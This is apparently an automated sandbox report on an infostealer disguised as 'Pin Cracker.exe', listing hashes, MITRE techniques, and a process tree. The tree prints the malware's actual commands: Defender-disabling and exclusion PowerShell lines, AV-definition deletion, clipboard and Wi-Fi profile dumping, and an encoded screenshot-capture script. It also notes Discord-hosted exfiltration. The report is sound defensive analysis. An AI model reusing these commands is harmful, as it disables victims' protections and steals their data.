58bd069e0b72373b4d8c77668ca556b82a3ee8e99f21f4edcbad424a7cca408c

Analysis

max time kernel
3s
max time network
10s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
09-12-2024 13:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Pin Cracker.exe
Size

7.0MB
MD5

440d8aa81b7f85f40fe6e33a5f97241c
SHA1

82d84fd1a61797b0c925715362cef867746be55a
SHA256

58bd069e0b72373b4d8c77668ca556b82a3ee8e99f21f4edcbad424a7cca408c
SHA512

0feaaacbb0e31eb4423de6baf32f3ff56b28d97cdff21f4dcecaa72e5cf2efe3821d51278269424167da792099932b2175d5d213bd141f2ddb36c6c30e4e1446
SSDEEP

196608:qTQsGbT/9bvLz3S1bA329Oqhiu6J3yZ4ZM:IGbTlj3S1bO29Oqh3618aM

Score

10^/10

collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
4448	MpCmdRun.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3000	powershell.exe
2352	powershell.exe
4576	powershell.exe
1780	powershell.exe
4628	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
5008	cmd.exe
2200	powershell.exe

Loads dropped DLL 18 IoCs

pid	Process
1624	Pin Cracker.exe
1624	Pin Cracker.exe
1624	Pin Cracker.exe
1624	Pin Cracker.exe
1624	Pin Cracker.exe
1624	Pin Cracker.exe
1624	Pin Cracker.exe
1624	Pin Cracker.exe
1624	Pin Cracker.exe
1624	Pin Cracker.exe
1624	Pin Cracker.exe
1624	Pin Cracker.exe
1624	Pin Cracker.exe
1624	Pin Cracker.exe
1624	Pin Cracker.exe
1624	Pin Cracker.exe
1624	Pin Cracker.exe
1624	Pin Cracker.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
21	discord.com
22	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
19	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
2392	tasklist.exe
2360	tasklist.exe
2600	tasklist.exe
3540	tasklist.exe

UPX packed file 57 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0028000000045057-22.dat	upx
behavioral1/memory/1624-25-0x00007FFF5ED90000-0x00007FFF5F379000-memory.dmp	upx
behavioral1/files/0x002800000004505b-28.dat	upx
behavioral1/memory/1624-31-0x00007FFF77B50000-0x00007FFF77B60000-memory.dmp	upx
behavioral1/files/0x002800000004504c-30.dat	upx
behavioral1/memory/1624-36-0x00007FFF75550000-0x00007FFF7555F000-memory.dmp	upx
behavioral1/files/0x0028000000045055-35.dat	upx
behavioral1/memory/1624-34-0x00007FFF72530000-0x00007FFF72553000-memory.dmp	upx
behavioral1/files/0x002800000004504f-42.dat	upx
behavioral1/memory/1624-44-0x00007FFF6DF30000-0x00007FFF6DF5D000-memory.dmp	upx
behavioral1/files/0x002800000004504b-46.dat	upx
behavioral1/files/0x0028000000045052-49.dat	upx
behavioral1/memory/1624-51-0x00007FFF6DF00000-0x00007FFF6DF23000-memory.dmp	upx
behavioral1/memory/1624-47-0x00007FFF72EA0000-0x00007FFF72EB9000-memory.dmp	upx
behavioral1/memory/1624-53-0x00007FFF6D3B0000-0x00007FFF6D527000-memory.dmp	upx
behavioral1/files/0x002800000004505a-52.dat	upx
behavioral1/files/0x0028000000045051-54.dat	upx
behavioral1/memory/1624-57-0x00007FFF725B0000-0x00007FFF725C9000-memory.dmp	upx
behavioral1/files/0x0028000000045053-59.dat	upx
behavioral1/files/0x0028000000045056-62.dat	upx
behavioral1/files/0x0028000000045054-61.dat	upx
behavioral1/memory/1624-70-0x00007FFF6DED0000-0x00007FFF6DEFE000-memory.dmp	upx
behavioral1/memory/1624-69-0x00007FFF5EA10000-0x00007FFF5ED88000-memory.dmp	upx
behavioral1/memory/1624-68-0x00007FFF5ED90000-0x00007FFF5F379000-memory.dmp	upx
behavioral1/memory/1624-67-0x00007FFF6D780000-0x00007FFF6D838000-memory.dmp	upx
behavioral1/memory/1624-64-0x00007FFF75540000-0x00007FFF7554D000-memory.dmp	upx
behavioral1/files/0x0028000000045059-56.dat	upx
behavioral1/files/0x002800000004504e-72.dat	upx
behavioral1/files/0x0028000000045050-74.dat	upx
behavioral1/files/0x002800000004505c-81.dat	upx
behavioral1/memory/1624-78-0x00007FFF72520000-0x00007FFF7252D000-memory.dmp	upx
behavioral1/memory/1624-83-0x00007FFF6D290000-0x00007FFF6D3AC000-memory.dmp	upx
behavioral1/memory/1624-77-0x00007FFF72530000-0x00007FFF72553000-memory.dmp	upx
behavioral1/memory/1624-75-0x00007FFF6DE80000-0x00007FFF6DE94000-memory.dmp	upx
behavioral1/memory/1624-84-0x00007FFF6DF30000-0x00007FFF6DF5D000-memory.dmp	upx
behavioral1/memory/1624-125-0x00007FFF6DF00000-0x00007FFF6DF23000-memory.dmp	upx
behavioral1/memory/1624-137-0x00007FFF6D3B0000-0x00007FFF6D527000-memory.dmp	upx
behavioral1/memory/1624-183-0x00007FFF6D780000-0x00007FFF6D838000-memory.dmp	upx
behavioral1/memory/1624-182-0x00007FFF725B0000-0x00007FFF725C9000-memory.dmp	upx
behavioral1/memory/1624-214-0x00007FFF5EA10000-0x00007FFF5ED88000-memory.dmp	upx
behavioral1/memory/1624-249-0x00007FFF6DED0000-0x00007FFF6DEFE000-memory.dmp	upx
behavioral1/memory/1624-251-0x00007FFF5ED90000-0x00007FFF5F379000-memory.dmp	upx
behavioral1/memory/1624-267-0x00007FFF6DED0000-0x00007FFF6DEFE000-memory.dmp	upx
behavioral1/memory/1624-276-0x00007FFF75540000-0x00007FFF7554D000-memory.dmp	upx
behavioral1/memory/1624-280-0x00007FFF6D290000-0x00007FFF6D3AC000-memory.dmp	upx
behavioral1/memory/1624-279-0x00007FFF72520000-0x00007FFF7252D000-memory.dmp	upx
behavioral1/memory/1624-278-0x00007FFF6DE80000-0x00007FFF6DE94000-memory.dmp	upx
behavioral1/memory/1624-277-0x00007FFF5EA10000-0x00007FFF5ED88000-memory.dmp	upx
behavioral1/memory/1624-275-0x00007FFF725B0000-0x00007FFF725C9000-memory.dmp	upx
behavioral1/memory/1624-274-0x00007FFF6D3B0000-0x00007FFF6D527000-memory.dmp	upx
behavioral1/memory/1624-273-0x00007FFF6DF00000-0x00007FFF6DF23000-memory.dmp	upx
behavioral1/memory/1624-272-0x00007FFF72EA0000-0x00007FFF72EB9000-memory.dmp	upx
behavioral1/memory/1624-271-0x00007FFF6DF30000-0x00007FFF6DF5D000-memory.dmp	upx
behavioral1/memory/1624-270-0x00007FFF75550000-0x00007FFF7555F000-memory.dmp	upx
behavioral1/memory/1624-269-0x00007FFF72530000-0x00007FFF72553000-memory.dmp	upx
behavioral1/memory/1624-268-0x00007FFF77B50000-0x00007FFF77B60000-memory.dmp	upx
behavioral1/memory/1624-262-0x00007FFF6D780000-0x00007FFF6D838000-memory.dmp	upx

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4636	cmd.exe
2472	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3648	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4440	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

pid	Process
4576	powershell.exe
3000	powershell.exe
3000	powershell.exe
1984	WMIC.exe
1984	WMIC.exe
1984	WMIC.exe
1984	WMIC.exe
2352	powershell.exe
2352	powershell.exe
4576	powershell.exe
4576	powershell.exe
2200	powershell.exe
2200	powershell.exe
2012	powershell.exe
2012	powershell.exe

Suspicious use of AdjustPrivilegeToken 50 IoCs

description	pid	Process
Token: SeDebugPrivilege	4576	powershell.exe
Token: SeDebugPrivilege	2360	tasklist.exe
Token: SeDebugPrivilege	2392	tasklist.exe
Token: SeDebugPrivilege	3000	powershell.exe
Token: SeDebugPrivilege	2352	powershell.exe
Token: SeIncreaseQuotaPrivilege	1984	WMIC.exe
Token: SeSecurityPrivilege	1984	WMIC.exe
Token: SeTakeOwnershipPrivilege	1984	WMIC.exe
Token: SeLoadDriverPrivilege	1984	WMIC.exe
Token: SeSystemProfilePrivilege	1984	WMIC.exe
Token: SeSystemtimePrivilege	1984	WMIC.exe
Token: SeProfSingleProcessPrivilege	1984	WMIC.exe
Token: SeIncBasePriorityPrivilege	1984	WMIC.exe
Token: SeCreatePagefilePrivilege	1984	WMIC.exe
Token: SeBackupPrivilege	1984	WMIC.exe
Token: SeRestorePrivilege	1984	WMIC.exe
Token: SeShutdownPrivilege	1984	WMIC.exe
Token: SeDebugPrivilege	1984	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1984	WMIC.exe
Token: SeRemoteShutdownPrivilege	1984	WMIC.exe
Token: SeUndockPrivilege	1984	WMIC.exe
Token: SeManageVolumePrivilege	1984	WMIC.exe
Token: 33	1984	WMIC.exe
Token: 34	1984	WMIC.exe
Token: 35	1984	WMIC.exe
Token: 36	1984	WMIC.exe
Token: SeDebugPrivilege	2200	powershell.exe
Token: SeDebugPrivilege	2012	powershell.exe
Token: SeDebugPrivilege	2600	tasklist.exe
Token: SeIncreaseQuotaPrivilege	1984	WMIC.exe
Token: SeSecurityPrivilege	1984	WMIC.exe
Token: SeTakeOwnershipPrivilege	1984	WMIC.exe
Token: SeLoadDriverPrivilege	1984	WMIC.exe
Token: SeSystemProfilePrivilege	1984	WMIC.exe
Token: SeSystemtimePrivilege	1984	WMIC.exe
Token: SeProfSingleProcessPrivilege	1984	WMIC.exe
Token: SeIncBasePriorityPrivilege	1984	WMIC.exe
Token: SeCreatePagefilePrivilege	1984	WMIC.exe
Token: SeBackupPrivilege	1984	WMIC.exe
Token: SeRestorePrivilege	1984	WMIC.exe
Token: SeShutdownPrivilege	1984	WMIC.exe
Token: SeDebugPrivilege	1984	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1984	WMIC.exe
Token: SeRemoteShutdownPrivilege	1984	WMIC.exe
Token: SeUndockPrivilege	1984	WMIC.exe
Token: SeManageVolumePrivilege	1984	WMIC.exe
Token: 33	1984	WMIC.exe
Token: 34	1984	WMIC.exe
Token: 35	1984	WMIC.exe
Token: 36	1984	WMIC.exe

Suspicious use of WriteProcessMemory 56 IoCs

description	pid	Process	procid_target
PID 3872 wrote to memory of 1624	3872	Pin Cracker.exe	82
PID 3872 wrote to memory of 1624	3872	Pin Cracker.exe	82
PID 1624 wrote to memory of 1948	1624	Pin Cracker.exe	83
PID 1624 wrote to memory of 1948	1624	Pin Cracker.exe	83
PID 1624 wrote to memory of 1788	1624	Pin Cracker.exe	84
PID 1624 wrote to memory of 1788	1624	Pin Cracker.exe	84
PID 1624 wrote to memory of 4740	1624	Pin Cracker.exe	85
PID 1624 wrote to memory of 4740	1624	Pin Cracker.exe	85
PID 1788 wrote to memory of 4576	1788	cmd.exe	89
PID 1788 wrote to memory of 4576	1788	cmd.exe	89
PID 1624 wrote to memory of 3648	1624	Pin Cracker.exe	177
PID 1624 wrote to memory of 3648	1624	Pin Cracker.exe	177
PID 1624 wrote to memory of 2136	1624	Pin Cracker.exe	91
PID 1624 wrote to memory of 2136	1624	Pin Cracker.exe	91
PID 1624 wrote to memory of 4960	1624	Pin Cracker.exe	94
PID 1624 wrote to memory of 4960	1624	Pin Cracker.exe	94
PID 3648 wrote to memory of 2360	3648	cmd.exe	176
PID 3648 wrote to memory of 2360	3648	cmd.exe	176
PID 2136 wrote to memory of 2392	2136	cmd.exe	97
PID 2136 wrote to memory of 2392	2136	cmd.exe	97
PID 1948 wrote to memory of 3000	1948	cmd.exe	98
PID 1948 wrote to memory of 3000	1948	cmd.exe	98
PID 4740 wrote to memory of 2352	4740	cmd.exe	99
PID 4740 wrote to memory of 2352	4740	cmd.exe	99
PID 1624 wrote to memory of 5008	1624	Pin Cracker.exe	100
PID 1624 wrote to memory of 5008	1624	Pin Cracker.exe	100
PID 1624 wrote to memory of 3252	1624	Pin Cracker.exe	102
PID 1624 wrote to memory of 3252	1624	Pin Cracker.exe	102
PID 1624 wrote to memory of 1404	1624	Pin Cracker.exe	103
PID 1624 wrote to memory of 1404	1624	Pin Cracker.exe	103
PID 1624 wrote to memory of 4636	1624	Pin Cracker.exe	105
PID 1624 wrote to memory of 4636	1624	Pin Cracker.exe	105
PID 1624 wrote to memory of 4316	1624	Pin Cracker.exe	107
PID 1624 wrote to memory of 4316	1624	Pin Cracker.exe	107
PID 1624 wrote to memory of 980	1624	Pin Cracker.exe	162
PID 1624 wrote to memory of 980	1624	Pin Cracker.exe	162
PID 1624 wrote to memory of 2824	1624	Pin Cracker.exe	111
PID 1624 wrote to memory of 2824	1624	Pin Cracker.exe	111
PID 4960 wrote to memory of 1984	4960	cmd.exe	114
PID 4960 wrote to memory of 1984	4960	cmd.exe	114
PID 5008 wrote to memory of 2200	5008	cmd.exe	116
PID 5008 wrote to memory of 2200	5008	cmd.exe	116
PID 4636 wrote to memory of 2472	4636	cmd.exe	117
PID 4636 wrote to memory of 2472	4636	cmd.exe	117
PID 2824 wrote to memory of 2012	2824	cmd.exe	118
PID 2824 wrote to memory of 2012	2824	cmd.exe	118
PID 3252 wrote to memory of 2600	3252	cmd.exe	119
PID 3252 wrote to memory of 2600	3252	cmd.exe	119
PID 1404 wrote to memory of 1768	1404	cmd.exe	120
PID 1404 wrote to memory of 1768	1404	cmd.exe	120
PID 4316 wrote to memory of 4440	4316	cmd.exe	121
PID 4316 wrote to memory of 4440	4316	cmd.exe	121
PID 980 wrote to memory of 3008	980	cmd.exe	122
PID 980 wrote to memory of 3008	980	cmd.exe	122
PID 1624 wrote to memory of 2440	1624	Pin Cracker.exe	123
PID 1624 wrote to memory of 2440	1624	Pin Cracker.exe	123

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4276	attrib.exe
5032	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Pin Cracker.exe
"C:\Users\Admin\AppData\Local\Temp\Pin Cracker.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3872
- C:\Users\Admin\AppData\Local\Temp\Pin Cracker.exe
  "C:\Users\Admin\AppData\Local\Temp\Pin Cracker.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Pin Cracker.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1948
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Pin Cracker.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1788
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4576
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:4448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍.scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4740
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍.scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3648
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2136
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4960
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:5008
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3252
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1404
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:4636
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4316
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:980
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:3008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2824
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
